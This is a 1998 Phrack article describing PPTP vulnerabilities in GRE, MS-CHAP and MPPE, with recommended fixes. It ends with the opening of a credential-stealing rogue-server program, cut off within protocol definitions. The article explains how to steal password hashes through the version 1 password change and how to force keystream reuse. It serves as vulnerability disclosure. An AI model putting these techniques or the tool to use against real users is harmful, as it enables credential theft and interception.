| ---[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 12 of 15 | |
| -------------------------[ The Crumbling Tunnel | |
| --------[ aleph1 <aleph1@underground.org> | |
| -[ The Crumbling Tunnel ]- | |
| < A Menagerie of PPTP Vulnerabilities > | |
| by aleph1@underground.org | |
| Point-to-Point Tunneling Protocol (PPTP) is a new networking | |
| technology that allows you to use the Internet as your own secure | |
| virtual private network (VPN). PPTP is integrated with the Remote | |
| Access Services (RAS) server which is built into Windows NT Server. | |
| With PPTP, your users can dial into a local ISP, or connect directly | |
| to the Internet, and access their network just as easily and securely | |
| as if they were at their desks. | |
| < http://www.microsoft.com/communications/pptp.htm > | |
| -[ p r e f a c e ]- | |
| This paper is a compendium of the discussions between myself and a Microsoft | |
| representative during October 1996 and May 1997 on several NT security | |
| mailing lists, the research done by Counterpane System and published in the | |
| paper "Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol | |
| (PPTP)" by B. Schneier and P. Mudge on June 1998, and a new vulnerability I | |
| have recently discovered. | |
| -[ i n t r o d u c t i o n ]- | |
| As stated above, the Point-to-Point Tunneling Protocol is Microsoft's attempt | |
| at creating a Virtual Private Network (VPN) protocol. Given their past | |
| history in developing and implementing protocols, an analysis of PPTP for | |
| security vulnerabilities would certainly be an interesting endeavor. The | |
| following is such an analysis. | |
| Although this analysis is technical in nature, I will not spend the time | |
| describing exactly how each protocol works. I will assume you have done your | |
| homework and at least briefly glanced over the specifications for each of | |
| the protocols involved. | |
| PPTP is really a number of protocols cobbled together to make a whole. The | |
| players are: | |
| GRE - The Generic Encapsulation Protocol. The protocol is | |
| defined in RFC 1701 and RFC 1702. Microsoft has defined | |
| their own extensions. They call their modifications | |
| GRE v2. | |
| PPP - The Point-to-Point Protocol. The protocol is defined | |
| in RFC 1661. The protocol is used for the transmission | |
| of multi-protocol datagrams over point-to-point links. | |
| PPTP - PPTP uses GRE to tunnel PPP and adds a connections setup | |
| and control protocol over a TCP session. | |
| MS-CHAP - This is Microsoft's variant of the more common PPP CHAP | |
| authentication protocol. It is a challenge response | |
| authentication algorithm. It supplies the challenge used | |
| by MPPE (see below) to encrypt the session. It also has | |
| two sub-protocols for changing passwords. It is defined in the | |
| draft draft-ietf-pppext-mschap-00.txt. | |
| MPPE - Microsoft's Point-to-Point Encryption protocol. This is | |
| the protocol in charge of generating a session key and | |
| encrypting the session. It is defined in the drafts | |
| draft-ietf-pppext-mppe-00.txt and draft-ietf-pppext-mppe-01.txt. | |
| < PPTP in a nutshell > | |
| PPTP creates a connection setup and control channel using TCP to the PPTP | |
| server (Microsoft's RAS). Using this connection, PPTP establishes a new GRE | |
| tunnel which will carry PPP packets from the client to the server. The client | |
| will authenticate to the server via PPP's negotiation mechanism using MS-CHAP | |
| and will then encrypt all PPP data packets using MPPE. | |
| Enough acronyms for you? Lets get dirty. | |
| -[ P P T P ]- | |
| PPTP creates a connection setup and control channel to the server using TCP. | |
| Originally the TCP port used was 5678. Later on it was changed to 1723. This | |
| is the IANA assigned port number. The control connection is not authenticated | |
| in any way. It is easy for Mallory (the malicious interloper) to take over | |
| the connection via TCP hijacking techniques. She can then issue Stop Session | |
| Request commands. This will close the control channel and at the same time all | |
| active calls (tunnels) will be cleared. | |
| -[ G R E ]- | |
| PPP packets are encapsulated in GRE and tunneled on top of IP. GRE uses IP | |
| protocol number 47. GRE packets are similar in some respects to TCP segments. | |
| They both may carry a sequence and acknowledgement number. GRE also uses a | |
| sliding window to avoid congestion. | |
| This has some important implications. It means that if we want to spoof PPP | |
| packets encapsulated in GRE, we will desynchronize the GRE channel. A | |
| possible way around this is the use of the "S" flag in the GRE header. This | |
| flag tells the end point if the GRE packet has a sequence number. It is | |
| possible that a badly coded implementation will accept a GRE packet with data | |
| even if it does not have a sequence number. This is because in the original | |
| GRE standard the use of sequence numbers was optional. Furthermore, the | |
| specification does not mention how an end system should act if it receives a | |
| GRE packet with a duplicate sequence number. It may simply discard it and | |
| send another acknowledgement. This would mean we do not need to resynchronize | |
| GRE at all. The other end will send an acknowledgement for the packet we | |
| spoofed and the encapsulated PPP should not become desynchronized. As of this | |
| writing I haven't yet tested this possibility. | |
| It is also interesting to note that the original GRE specification has many | |
| options to do things like source routing which are left as implementation | |
| specific. If you open a hole in your firewall for GRE just so you can use | |
| PPTP you might be letting in more than you think. This area needs further | |
| investigation. | |
| -[ M S - C H A P ]- | |
| MS-CHAP is a challenge response protocol. The server send the client an 8 | |
| byte challenge. The client computes a response by encrypting the challenge | |
| with the NT one way hash and then with the LANMAN one way hash. | |
| < Dictionary Attack > | |
| Like most other challenge/response protocols, this one is vulnerable to a | |
| dictionary by such tools as L0phtcrack. As Schneier and Mudge describe in | |
| their paper, the LANMAN based response is easier to crack than it normally is | |
| because here it is divided into three pieces which are encrypted independently. | |
| This allows for a speed up in breaking the password. Please see their paper | |
| for a detailed explanation of the process. | |
| The PPTP Performance update for Windows NT 4.0 (PPTP2-FIX) stops the PPTP | |
| Windows NT client from sending the LANMAN hash based response if the client | |
| is configured to use 128-bit encryption. The same fix also allows the server | |
| to reject PPTP clients that attempt to authenticate using the LANMAN hash | |
| based response. | |
| < Stealing the Password > | |
| MS-CHAP has two sub-protocols for changing password. In version one the | |
| client encrypts the new and old hashes (NT and LANMAN) with the challenge | |
| the server sent over the wire. A passive attacker can simply decrypt the | |
| hashes and steal them. | |
| Version two encrypts the new hashes with the old hashes and encrypts the old | |
| hashes with the new hashes. Only the server, which knows the old hashes, | |
| will be able to decrypt the new hashes and use these to decrypt the old | |
| hashes and verify the user's identity. | |
| As I recently discovered, this feature of MS-CHAP can be used to steal the | |
| user's password hashes if Mallory can masquerade as the PPTP server. Several | |
| methods to masquerade as the server come into mind, including DNS hijacking | |
| and RIP spoofing. Once the unsuspecting user connects to Mallory's rogue | |
| server and attempts to authenticate she will return a ERROR_PASSWD_EXPIRE | |
| error to the user and tell the client to use the older version of the | |
| password change sub-protocol. The user will then be prompted by the PPTP | |
| client to enter his old and new password. The client will proceed to send | |
| the new and old password hashes, LANMAN and NT, encrypted with the challenge | |
| the rouge server sent. Now Mallory can use the hashes to logon into the real | |
| PPTP server and impersonate the user. | |
| The MS-CHAP draft deprecates the use of the change password version 1 protocol | |
| but Microsoft's implementation continue to support it. This vulnerability was | |
| verified using Windows NT's RAS PPTP client with the PPTP Performance Update | |
| (PPTP2-FIX) installed. At the end you will find some source code that | |
| implements a demonstration PPTP server that asks the user to change passwords | |
| using the older protocol and prints the stolen hashes on the screen. | |
| -[ M P P E ]- | |
| The are two drafts for MPPE. I'll discuss the earlier one first. | |
| MPPE uses RC4, a stream cipher, to encrypt the PPP datagrams. MPPE is | |
| negotiated as a compression protocol as part of PPP's Link Control Protocol | |
| negotiation. | |
| < Session Keys > | |
| MPPE currently supports 40 and 128 bit session keys, although more key lengths | |
| can be defined. The 40-bit session key is derived from the first 8 bytes of | |
| the LANMAN hash. The session key will be the same for all sessions until the | |
| user changes his password. | |
| The 128-bit session key is created by taking the first 16 bytes of the MD4 | |
| hash and the first 16 bytes of the NT hash, and then hashing them with the | |
| servers challenge. Microsoft claims that they hash the NT hash to protect it. | |
| I fail to see their point. The password hash, nor it's hash, ever go over the | |
| wire. Why they selected this algorithm remains a mystery. | |
| The new MPPE draft adds an option to use a 40-bit key derived from the NT hash. | |
| As Schneier and Mudge point out, it is misleading to say MPPE provides | |
| 128-bit, or even 40-bit, security. The 40-bit LANMAN based session key is | |
| derived from the password only, and as such will have a much lower entropy | |
| than a random 40-bit key. The 128-bit and 40-bit NT hash based session keys | |
| are derived from both the users password and the server's challenge. | |
| Depending on how good the server's random number generator is, the session | |
| key may have a much lower entropy than 128 or 40 bits. A study of how | |
| Microsoft's PPTP server, and NT in general, generates random numbers would | |
| be interesting. The only way to guarantee the full strength of the key is by | |
| generating it with a good RNG. | |
| < Attacking PPP > | |
| As Schneier and Mudge also point, out only PPP packets with protocol numbers | |
| between 0x21 and 0xFA are encrypted (in essence only data packets are | |
| encrypted). In contrast, the PPP Encryption Control Protocol (RFC 1968) | |
| encrypts all packets other than LCP packets after ECP is negotiated. | |
| This means Mallory can spoof Network Control Protocol packets with impunity. | |
| It also means she can obtain some useful information by simply sniffing the | |
| NCP packets. Things like whether the internal network uses IP, IPX, or | |
| NetBIOS, the internal IP address of the PPTP client, NetBIOS names, the IP | |
| address of internal WINS and DNS servers, the clients internal IPX node | |
| number and other things. Read the IPCP (RFC 13320, NBFCP (RFC 2097) and | |
| IPXCP (RFC 1552) specifications for more information. | |
| < Breaking RC4 > | |
| Stream ciphers, like RC4, are susceptible to attack if two or more plaintexts | |
| are encrypted with the same key. If you take two ciphertexts encrypted with | |
| the same key and xor them together you will obtain the two plaintexts xor'ed | |
| together. If you can make an educated guess as to the structure and contents | |
| of part of one of the plaintexts you will be able to obtain the corresponding | |
| plaintext in the other message. | |
| MPPE is susceptible to such an attack. As mentioned above the 40-bit session | |
| key is the same in each session. Mallory can passively monitor the network | |
| and collect many sessions, all encrypted with the same key that she can then | |
| attempt to break. The problem is compounded since she has learned things | |
| like the clients internal IP address and its NetBIOS name which will be in | |
| the encrypted packets by monitoring the NCP PPP packets. | |
| MPPE uses the same key in each direction. For each session at least two | |
| packets, one inbound and one outbound, will be encrypted with the same key. | |
| In this way, even traffic protected by the 128-bit unique session key can be | |
| attacked. | |
| MPPE being a sub-protocol of PPP, a datagram protocol, does not expect a | |
| reliable link. Instead it maintains a 12-bit coherency count that is | |
| increased for each packet to keep the encryption tables synchronized. Each | |
| time the low order byte of the coherency count equals 0xFF (every 256 packets) | |
| the session key is regenerated based on the original session key and the | |
| current session key. | |
| If MPPE ever sees a packet with a coherency that it is not expecting it | |
| sends a CCP Reset-Request packet to the other end. The other end, upon seeing | |
| this packet, will re-initialize the RC4 tables using the current session key. | |
| The next packet it sends will have the flushed bit set. This bit will | |
| indicate to the other end that it should re-initialize its own tables. In | |
| this way they become resynchronized. This mode of operation is called | |
| "stateful mode" in the new MPPE draft. | |
| What does this all mean to us? Well, it means we can force both ends of the | |
| connection to keep encrypting their packets with the same key until the low | |
| order sequence number reaches 0xFF. For example assume Alice and Bob have | |
| just set up the communication channel. They both have initialized their | |
| session keys and expect a packet with a coherency count of zero. | |
| Alice -> Bob | |
| Alice sends Bob a packet numbered zero encrypted with the cipher stream | |
| generated by the RC4 cipher and increments her sent coherency count to one. | |
| Bob receives the packet, decrypts it, and increments his receive coherency | |
| count to 1. | |
| Mallory (Bob) -> Alice | |
| Mallory sends Alice a spoofed (remember this is datagram protocol - assuming | |
| we don't desynchronize GRE) CCP Reset-Request packet. Alice immediately | |
| re-initializes her RC4 tables to their original state. | |
| Alice -> Bob | |
| Alice sends another packet to Bob. This packet will be encrypted with the | |
| same cipherstream as the last packet. The packet will also have the FLUSHED | |
| bit set. This will make Bob re-initialize its own RC4 tables. | |
| Mallory can continue to play this game up to a total of 256 times after | |
| which the session key will be changed. By this point Mallory will have | |
| collected 256 packets from Alice to Bob all encrypted with the same cipher | |
| stream. | |
| Furthermore, since Alice and Bob start with the same session key in each | |
| direction Mallory can play the same game in the opposite direction collecting | |
| another 256 packets encrypted with the same cipher stream as the ones going | |
| from Alice to Bob. | |
| The Apr 1998 version of the draft adds a "stateless mode" option (otherwise | |
| known as "historyless mode" in some Microsoft literature) to the negotiation | |
| packets. This option tells MPPE to change the session key after every packet | |
| and to ignore all this CCP Reset-Request and flushed bit business. This | |
| option was introduced to improve PPTP's performance. Although re-keying | |
| after each packet cuts the cipher performance by almost half, now PPTP no | |
| longer has to wait a whole round trip time to resynchronize. This, in effect | |
| improves the performance of PPTP and at the same time made the attack I | |
| describe above useless. | |
| This new stateless mode was incorporated in the PPTP Performance Update for | |
| Windows NT 4.0 (PPTP2-FIX). | |
| < Bit Flipping > | |
| Schneier and Mudge describe a bit flipping attack in their paper. Because of | |
| the properties of the RC4 cipher as used within MPPE an attacker can flip | |
| bits in the ciphertext that will be decrypted correctly by MPPE. In this way | |
| an attacker can modify encrypted packets while they are in transit. | |
| -[ i m p l e m e n t a t i o n b u g s ]- | |
| Schneier and Mudge describe a number of implementation bugs in Microsoft's | |
| PPTP control channel that crashed Windows NT with the Blue Screen of Death. | |
| Keving Wormington has found similar problem as posted some demonstration | |
| code to the BugTraq mailing list in Nov 1997. Microsoft claims to have fixed | |
| this or similar problems in their PPTP-FIX hotfix. | |
| Schneier and Mudge also found that the Windows 95 client does not zero fill | |
| its buffers and leaks information in its protocol packets. | |
| A bug in the PPTP server allows clients to remain connected while packets | |
| are transmitted in the clear if the encryption negotiation between the | |
| client and server fails. This problem is documented in Microsoft's Knowledge | |
| Base article Q177670. They claim to have fixed it in the PPTP-FIX hotfix. | |
| -[ f i x i n g t h i n g s ]- | |
| It is interesting to note that Microsoft has chosen to omit certain | |
| vulnerabilities from their response to the Counterpane paper. Let's summarize | |
| them here so they don't get confused: | |
| ---> The control connection is not authenticated. | |
| Microsoft claims they will enhance the control channel in future updates | |
| to authenticate each control packet. | |
| ---> The MS-CHAP LANMAN hash response is vulnerable to a dictionary attack | |
| ---| that can be speed up enormously. | |
| The PPTP Performance Update for Windows NT 4.0 has added the option | |
| to reject PPTP clients that attempt to use the LANMAN based response. | |
| It also stops the Windows NT PPTP client from sending the LANMAN | |
| based response when it is configured to require 128-bit encryption. | |
| This is of little comfort to non-US customers that cannot use the | |
| 128-bit version of the software. Microsoft claims to be testing | |
| a Windows 95 client update, possibly DUN 1.3, that will stop clients | |
| from sending the LANMAN response. The only way for Microsoft to | |
| completely get rid of the 40-bit LANMAN hash based key and support | |
| non-US customers is for them to implement the 40-bit NT hash based | |
| session key introduced in the second MPPE draft. | |
| ---> The MS-CHAP NT hash response is vulnerable to a dictionary attack. | |
| They must not use the password for authentication. Some sort of | |
| public key protocol would fix the problem. | |
| ---> A attacker can steal a users password hashes via the MS-CHAP password | |
| ---| change protocol version one. | |
| They update all the clients to stop responding to password change | |
| requests using version one of the protocol. | |
| ---> The 40-bit LANMAN hash based session key is the same across sessions. | |
| ---> MPPE does not provide true 128-bit or 40-bit security. | |
| Microsoft simply recommends that customers enforce a strong password | |
| policy. They should instead modify PPTP to generate truly random | |
| keys. | |
| ---> MPPE does not encrypt Network Control Protocol PPP packets. | |
| NCP packets should be encrypted. | |
| ---> MPPE uses the same key in both directions. | |
| Each direction must be started with a different key. | |
| ---> MPPE is vulnerable to a Reset-Request attack. | |
| Microsoft has fixed this problem in the latest PPTP draft by introducing | |
| the stateless mode. The PPTP Performance Update for Windows NT 4.0 | |
| implements this mode of operation. There is no solution for Windows 95 yet. | |
| This means that if you have Windows 95 PPTP clients you are still vulnerable. | |
| ---> MPPE is vulnerable to bit flipping attacks. | |
| They must add a MAC to each packet or use a cipher other than RC4 that | |
| does not exhibit this property. | |
| ---> There are a number of denial of service and other vulnerabilities | |
| ---| caused by implementation errors. | |
| Microsoft claims to have fixed some of this problems with | |
| PPTP-FIX and PPTP2-FIX. | |
| At least Microsoft should produce an Windows NT and Windows 95 PPTP update | |
| that does not use the same session keys in each direction, that does not | |
| support MS-CHAP password change protocol version one, does not send the send | |
| to LANMAN based response and supports the 40-bit NT hash based session key. | |
| -[ f u t u r e d i r e c t i o n s ]- | |
| Microsoft's VPN strategy appears to be moving away from PPTP and going to | |
| Layer Two Tunneling Protocol (L2TP) and IPsec. L2TP (currently an IETF | |
| draft) is a compromise between Cisco's Layer Two Forwarding (L2F), (a | |
| competing protocol) and PPTP. This is certain to take a long time and they | |
| will probably support PPTP for backwards compatibility. | |
| L2TP is somewhat similar to PPTP. L2TP uses UDP instead of GRE to tunnel the | |
| PPP packets. Connection setup and control packets are carried within UDP. | |
| The protocol provides for the authentication of the control session via a | |
| shared secret and a challenge/response exchange. It also provides the for | |
| the hiding of sensitive information, such as username and password, by | |
| encrypting it. | |
| Other than those simply security mechanism L2TP does not provide any | |
| security. To operate L2TP in a secure manner you must use it with either | |
| IPsec to provide authentication and confidentiality of all IP packets, or by | |
| using PPP layer security. If the former is chosen beware that the control | |
| packets can be spoofed after the authentication phase. | |
| If Microsoft decides to go with the later choice (possible because Windows | |
| 98 will not have support for IPsec), they are well advised not to use MPPE | |
| and MS-CHAP as this would make L2TP almost as vulnerable as PPTP. They would | |
| do better implementing ECP and some of the PPP Extensible Authentication | |
| Protocol (RFC 2284) options. | |
| For a discussion of L2TP security read the Security Considerations section | |
| of the L2TP draft. | |
| -[ m i s c e l l a n e o u s ]- | |
| The are a few interesting projects related to PPTP. | |
| -> Linux PPTP Masquerading | |
| < http://bmrc.berkeley.edu/people/chaffee/linux_pptp.html > | |
| Here you will find patches to the Linux kernel to support masquerading of | |
| PPTP connections. | |
| -> PPTP Client for Linux | |
| < http://www.pdos.lcs.mit.edu/~cananian/Projects/PPTP/ > | |
| Here you will find a free PPTP client implementation for Linux that should | |
| be easy to port to other platforms. | |
| -[ s u m m a r y ]- | |
| PPTP is a layer two tunneling protocol designed by Microsoft and some other | |
| vendors. The protocol and in particular Microsoft's implementation have a | |
| number of vulnerabilities not completely fixed by the their latest software | |
| patches and draft revisions. | |
| PPTP will most likely stop most amateurs but by no means provides air tight | |
| security. If you have some serious security needs we recommend you look at | |
| some other solution. | |
| The Layer Two Tunneling Protocol being defined within the IETF evolved from | |
| PPTP and Cisco's Layer Two Forwarding. It has obviously benefited from the | |
| peer review it has had within the IETF as it looks like much better protocol | |
| than PPTP. If combined with IPsec, L2TP looks like a promising solution. | |
| -[ r e f e r e n c e s ]- | |
| Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP) | |
| by B. Schneier and P. Mudge | |
| < http://www.counterpane.com/pptp.html > | |
| Generic Routing Encapsulation (GRE) (RFC 1701) | |
| < ftp://ds.internic.net/rfc/rfc1701.txt > | |
| Generic Routing Encapsulation over IPv4 networks (RFC 1702) | |
| < ftp://ds.internic.net/rfc/rfc1702.txt > | |
| Layer Two Tunneling Protocol "L2TP" (May 1996) | |
| < http://www.ietf.org/internet-drafts/draft-ietf-pppext-l2tp-11.txt > | |
| Microsoft Point-To-Point Encryption (MPPE) Protocol (March 1998) | |
| < http://www.apocalypse.org/pub/internet-drafts/draft-ietf-pppext-mppe-00.txt > | |
| Microsoft Point-To-Point Encryption (MPPE) Protocol (April 1998) | |
| < http://www.ietf.org/internet-drafts/draft-ietf-pppext-mppe-01.txt > | |
| Microsoft PPP CHAP Extensions | |
| < http://www.ietf.org/internet-drafts/draft-ietf-pppext-mschap-00.txt > | |
| Point-to-Point Tunneling Protocol | |
| < http://www.microsoft.com/communications/pptp.htm > | |
| Point-to-Point Tunneling Protocol (PPTP) Technical Specification (Feb, 22 1996) | |
| < http://hooah.com/workshop/prog/prog-gen/pptp.htm > | |
| Point-to-Point Tunneling Protocol--PPTP (Draft July 1997) | |
| < http://www.microsoft.com/communications/exes/draft-ietf-pppext-pptp-01.txt > | |
| PPTP and Implementation of Microsoft Virtual Private Networking | |
| < http://www.microsoft.com/communications/nrpptp.htm > | |
| PPTP Performance Update for Windows NT 4.0 Release Notes | |
| < http://support.microsoft.com/support/kb/articles/q167/0/40.asp > | |
| PPTP Security - An Update | |
| < http://www.microsoft.com/communications/pptpfinal.htm > | |
| RRAS Does Not Enforce String Encryption for DUN Clients | |
| < http://support.microsoft.com/support/kb/articles/q177/6/70.asp > | |
| STOP 0x0000000A in Raspptpe.sys on a Windows NT PPTP Server | |
| < http://support.microsoft.com/support/kb/articles/q179/1/07.asp > | |
| The Point-to-Point Protocol (PPP) (RFC 1661) | |
| < ftp://ftp.isi.edu/in-notes/rfc1661.txt > | |
| The PPP DES Encryption Protocol (DESE) (RFC 1969) | |
| < ftp://ftp.isi.edu/in-notes/rfc1969.txt > | |
| The PPP Encryption Control Protocol (ECP) (RFC 1968) | |
| < ftp://ftp.isi.edu/in-notes/rfc1968.txt > | |
| The PPP Internetwork Packet Exchange Control Protocol (IPXCP) 9rFC 1552) | |
| < ftp://ftp.isi.edu/in-notes/rfc1552.txt > | |
| The PPP NetBIOS Frames Control Protocol (NBFCP) (RFC 2097) | |
| < ftp://ftp.isi.edu/in-notes/rfc2097.txt > | |
| ---------------------8<------------CUT-HERE----------->8--------------------- | |
| <++> PPTP/deceit.c | |
| /* | |
| * deceit.c by Aleph One | |
| * | |
| * This program implements enough of the PPTP protocol to steal the | |
| * password hashes of users that connect to it by asking them to change | |
| * their password via the MS-CHAP password change protocol version 1. | |
| * | |
| * The GRE code, PPTP structures and defines were shamelessly stolen from | |
| * C. Scott Ananian's <cananian@alumni.princeton.edu> Linux PPTP client | |
| * implementation. | |
| * | |
| * This code has been tested to work againts Windows NT 4.0 with the | |
| * PPTP Performance Update. If the user has selected to use the same | |
| * username and password as the account they are currently logged in | |
| * but enter a different old password when the PPTP client password | |
| * change dialog box appears the client will send the hash for a null | |
| * string for both the old LANMAN hash and old NT hash. | |
| * | |
| * You must link this program against libdes. Email messages asking how | |
| * to do so will go to /dev/null. | |
| * | |
| * Define BROKEN_RAW_CONNECT if your system does not know how to handle | |
| * connect() on a raw socket. Normally if you use connect with a raw | |
| * socket you should only get from the socket IP packets with the | |
| * source address that you specified to connect(). Under HP-UX using | |
| * connect makes read never to return. By not using connect we | |
| * run the risk of confusing the GRE decapsulation process if we receive | |
| * GRE packets from more than one source at the same time. | |
| */ | |
| #include <stdio.h> | |
| #include <sys/time.h> | |
| #include <netinet/in.h> | |
| #include <sys/socket.h> | |
| #include <signal.h> | |
| #include <unistd.h> | |
| #include "des.h" | |
| #ifdef __hpux__ | |
| #define u_int8_t uint8_t | |
| #define u_int16_t uint16_t | |
| #define u_int32_t uint32_t | |
| #endif | |
| /* define these as appropiate for your architecture */ | |
| #define hton8(x) (x) | |
| #define ntoh8(x) (x) | |
| #define hton16(x) htons(x) | |
| #define ntoh16(x) ntohs(x) | |
| #define hton32(x) htonl(x) | |
| #define ntoh32(x) ntohl(x) | |
| #define PPTP_MAGIC 0x1A2B3C4D /* Magic cookie for PPTP datagrams */ | |
| #define PPTP_PORT 1723 /* PPTP TCP port number */ | |
| #define PPTP_PROTO 47 /* PPTP IP protocol number */ | |
| #define PPTP_MESSAGE_CONTROL 1 | |
| #define PPTP_MESSAGE_MANAGE 2 | |
| #define PPTP_VERSION_STRING "1.00" | |
| #define PPTP_VERSION 0x100 | |
| #define PPTP_FIRMWARE_STRING "0.01" | |
| #define PPTP_FIRMWARE_VERSION 0x001 | |
| /* (Control Connection Management) */ | |
| #define PPTP_START_CTRL_CONN_RQST 1 | |
| #define PPTP_START_CTRL_CONN_RPLY 2 | |
| #define PPTP_STOP_CTRL_CONN_RQST 3 | |
| #define PPTP_STOP_CTRL_CONN_RPLY 4 | |
| #define PPTP_ECHO_RQST 5 | |
| #define PPTP_ECHO_RPLY 6 | |
| /* (Call Management) */ | |
| #define PPTP_OUT_CALL_RQST 7 | |
| #define PPTP_OUT_CALL_RPLY 8 | |
| #define PPTP_IN_CALL_RQST 9 | |
| #define PPTP_IN_CALL_RPLY 10 | |
| #define PPTP_IN_CALL_CONNECT 11 | |
| #define PPTP_CALL_CLEAR_RQST 12 | |
| #define PPTP_CALL_CLEAR_NTFY 13 | |
| /* (Error Reporting) */ | |
| #define PPTP_WAN_ERR_NTFY 14 | |
| /* (PPP Session Control) */ | |
| #define PPTP_SET_LINK_INFO 15 | |
| /* (Framing capabilities for msg sender) */ | |
| #define PPTP_FRAME_ASYNC 1 | |
| #define PPTP_FRAME_SYNC 2 | |
| #define PPTP_FRAME_ANY 3 | |
| /* (Bearer capabilities for msg sender) */ | |
| #define PPTP_BEARER_ANALOG 1 | |
| #define PPTP_BEARER_DIGITAL 2 | |
| #define PPTP_BEARER_ANY 3 | |
| struct pptp_header { | |
| u_int16_t length; /* message length in octets, including header */ | |
| u_int16_t pptp_type; /* PPTP message type. 1 for control message. */ | |
| u_int32_t magic; /* this should be PPTP_MAGIC. */ | |
| u_int16_t ctrl_type; /* Control message type (0-15) */ | |
| u_int16_t reserved0; /* reserved. MUST BE ZERO. */ | |
| }; | |
| struct pptp_start_ctrl_conn { /* for control message types 1 and 2 */ | |
| struct pptp_header header; | |
| u_int16_t version; /* PPTP protocol version. = PPTP_VERSION */ | |
| u_int8_t result_code; /* these two fields should be zero on rqst msg*/ | |
| u_int8_t error_code; /* 0 unless result_code==2 (General Error) */ | |
| u_int32_t framing_cap; /* Framing capabilities */ | |
| u_int32_t bearer_cap; /* Bearer Capabilities */ | |
| u_int16_t max_channels; /* Maximum Channels (=0 for PNS, PAC ignores) */ | |
| u_int16_t firmware_rev; /* Firmware or Software Revision */ | |
| u_int8_t hostname[64]; /* Host Name (64 octets, zero terminated) */ | |
| u_int8_t vendor[64]; /* Vendor string (64 octets, zero term.) */ | |
| /* MS says that end of hostname/vendor fields should be filled with */ | |
| /* octets of value 0, but Win95 PPTP driver doesn't do this. */ | |
| }; | |
| struct pptp_out_call_rqst { /* for control message type 7 */ | |
| struct pptp_header header; | |
| u_int16_t call_id; /* Call ID (unique id used to multiplex data) */ | |
| u_int16_t call_sernum; /* Call Serial Number (used for logging) */ | |
| u_int32_t bps_min; /* Minimum BPS (lowest acceptable line speed) */ | |
| u_int32_t bps_max; /* Maximum BPS (highest acceptable line speed) */ | |
| u_int32_t bearer; /* Bearer type */ | |
| u_int32_t framing; /* Framing type */ | |
| u_int16_t recv_size; /* Recv. Window Size (no. of buffered packets) */ | |
| u_int16_t delay; /* Packet Processing Delay (in 1/10 sec) */ | |
| u_int16_t phone_len; /* Phone Number Length (num. of valid digits) */ | |
| u_int16_t reserved1; /* MUST BE ZERO */ | |
| u_int8_t phone_num[64]; /* Phone Number (64 octets, null term.) */ | |
| u_int8_t subaddress[64]; /* Subaddress (64 octets, null term.) */ | |
| }; | |
| struct pptp_out_call_rply { /* for control message type 8 */ | |
| struct pptp_header header; | |
| u_int16_t call_id; /* Call ID (used to multiplex data over tunnel)*/ | |
| u_int16_t call_id_peer; /* Peer's Call ID (call_id of pptp_out_call_rqst)*/ | |
| u_int8_t result_code; /* Result Code (1 is no errors) */ | |
| u_int8_t error_code; /* Error Code (=0 unless result_code==2) */ | |
| u_int16_t cause_code; /* Cause Code (addt'l failure information) */ | |
| u_int32_t speed; /* Connect Speed (in BPS) */ | |
| u_int16_t recv_size; /* Recv. Window Size (no. of buffered packets) */ | |
| u_int16_t delay; /* Packet Processing Delay (in 1/10 sec) */ | |
| u_int32_t channel; /* Physical Channel ID (for logging) */ | |
| }; | |
| struct pptp_set_link_info { /* for control message type 15 */ | |
| struct pptp_header header; | |
| u_int16_t call_id_peer; /* Peer's Call ID (call_id of pptp_out_call_rqst) */ | |
| u_int16_t reserved1; /* MUST BE ZERO */ | |
| u_int32_t send_accm; /* Send ACCM (for PPP packets; default 0xFFFFFFFF)*/ | |
| u_int32_t recv_accm; /* Receive ACCM (for PPP pack.;default 0xFFFFFFFF)*/ | |
| }; | |
| #define PPTP_GRE_PROTO 0x880B | |
| #define PPTP_GRE_VER 0x1 | |
| #define PPTP_GRE_FLAG_C 0x80 | |
| #define PPTP_GRE_FLAG_R 0x40 | |
| #define PPTP_GRE_FLAG_K 0x20 | |
| #define PPTP_GRE_FLAG_S 0x10 | |
| #define PPTP_GRE_FLAG_A 0x80 | |
| #define PPTP_GRE_IS_C(f) ((f)&PPTP_GRE_FLAG_C) | |
| #define PPTP_GRE_IS_R(f) ((f)&PPTP_GRE_FLAG_R) | |
| #define PPTP_GRE_IS_K(f) ((f)&PPTP_GRE_FLAG_K) | |
| #define PPTP_GRE_IS_S(f) ((f)&PPTP_GRE_FLAG_S) | |
| #define PPTP_GRE_IS_A(f) ((f)&PPTP_GRE_FLAG_A) | |
| struct pptp_gre_header { | |
| u_int8_t flags; /* bitfield */ | |
| u_int8_t ver; /* should be PPTP_GRE_VER (enhanced GRE) */ | |
| u_int16_t protocol; /* should be PPTP_GRE_PROTO (ppp-encaps) */ | |
| u_int16_t payload_len; /* size of ppp payload, not inc. gre header */ | |
| u_int16_t call_id; /* peer's call_id for this session */ | |
| u_int32_t seq; /* sequence number. Present if S==1 */ | |
| u_int32_t ack; /* seq number of highest packet recieved by */ | |
| /* sender in this session */ | |
| }; | |
| #define PACKET_MAX 8196 | |
| static u_int32_t ack_sent, ack_recv; | |
| static u_int32_t seq_sent, seq_recv; | |
| static u_int16_t pptp_gre_call_id; | |
| #define PPP_ADDRESS 0xFF | |
| #define PPP_CONTROL 0x03 | |
| /* PPP Protocols */ | |
| #define PPP_PROTO_LCP 0xc021 | |
| #define PPP_PROTO_CHAP 0xc223 | |
| /* LCP Codes */ | |
| #define PPP_LCP_CODE_CONF_RQST 1 | |
| #define PPP_LCP_CODE_CONF_ACK 2 | |
| #define PPP_LCP_CODE_IDENT 12 | |
| /* LCP Config Options */ | |
| #define PPP_LCP_CONFIG_OPT_AUTH 3 | |
| #define PPP_LCP_CONFIG_OPT_MAGIC 5 | |
| #define PPP_LCP_CONFIG_OPT_PFC 7 | |
| #define PPP_LCP_CONFIG_OPT_ACFC 8 | |
| /* Auth Algorithms */ | |
| #define PPP_LCP_AUTH_CHAP_ALGO_MSCHAP 0x80 | |
| /* CHAP Codes */ | |
| #define PPP_CHAP_CODE_CHALLENGE 1 | |
| #define PPP_CHAP_CODE_RESPONCE 2 | |
| #define PPP_CHAP_CODE_SUCESS 3 | |
| #define PPP_CHAP_CODE_FAILURE 4 | |
| #define PPP_CHAP_CODE_MSCHAP_PASSWORD_V1 5 | |
| #define PPP_CHAP_CODE_MSCHAP_PASSWORD_V2 6 | |
| #define PPP_CHAP_CHALLENGE_SIZE 8 | |
| #define PPP_CHAP_RESPONCE_SIZE 49 | |
| #define MSCHAP_ERROR "E=648 R=0" | |
| struct ppp_header { | |
| u_int8_t address; | |
| u_int8_t control; | |
